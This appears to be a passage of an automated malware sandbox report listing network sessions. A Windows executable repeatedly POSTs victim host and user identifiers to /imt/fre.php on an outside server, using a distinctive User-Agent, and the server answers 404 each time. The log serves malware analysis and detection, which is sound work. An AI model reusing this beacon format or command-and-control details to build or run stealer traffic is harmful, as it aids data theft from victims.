                  Nov 25, 2021 18:22:51.163779974 CET1125INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:51 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  17192.168.2.349763194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:52.226443052 CET1126OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:52.465967894 CET1126OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:52.969003916 CET1127INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:52 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  18192.168.2.349765194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:54.348325014 CET1138OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:54.591702938 CET1138OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:54.655709982 CET1139INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:54 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  19192.168.2.349766194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:55.798213005 CET1140OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:56.044425964 CET1140OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:56.114464998 CET1141INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:55 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  2192.168.2.349746194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:21.772417068 CET1083OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:21.800093889 CET1083OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:21.949353933 CET1084INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:21 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  20192.168.2.349769194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:58.836458921 CET1156OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:59.091531038 CET1156OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:59.163003922 CET1156INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:58 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  21192.168.2.349770194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:01.423938036 CET1268OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:01.452536106 CET1268OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:02.684122086 CET1404INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:01 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  22192.168.2.349785194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:07.452291965 CET1965OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:07.480137110 CET1965OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:07.544955015 CET1967INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:07 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  23192.168.2.349809194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:09.396769047 CET7360OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:09.425380945 CET7360OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:09.919205904 CET7365INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:09 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  24192.168.2.349813194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:13.834389925 CET7369OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:13.863667965 CET7369OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:13.931421995 CET7370INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:13 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  25192.168.2.349814194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:19.463238955 CET7370OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:19.491267920 CET7371OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:20.086960077 CET7371INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:19 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  26192.168.2.349817194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:23.655364990 CET7987OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:23.683413029 CET7987OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:24.492059946 CET7988INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:23 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  27192.168.2.349818194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:26.318058014 CET7988OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:26.345900059 CET7989OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:26.435048103 CET7989INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:26 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  28192.168.2.349819194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:27.828007936 CET7990OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:27.856122971 CET7990OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:27.923948050 CET7991INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:27 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  29192.168.2.349820194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:29.237001896 CET7991OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:29.264524937 CET7991OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:29.329432964 CET7992INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:29 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  3192.168.2.349747194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:23.379975080 CET1084OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:23.408200026 CET1085OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:23.474404097 CET1085INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:23 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  30192.168.2.349821194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:30.587831020 CET7992OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:30.828551054 CET7993OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:30.896799088 CET7993INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:30 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  31192.168.2.349822194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:32.864603043 CET7994OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:32.894982100 CET7994OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:32.960192919 CET7994INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:32 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  32192.168.2.349823194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:35.140691042 CET7995OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:35.169219971 CET7995OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:35.375535965 CET7996INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:35 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  33192.168.2.349825194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:36.493113041 CET8002OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:36.520931959 CET8002OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:23:37.014189005 CET8003INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:36 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  34192.168.2.349827194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:23:40.295825958 CET8012OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
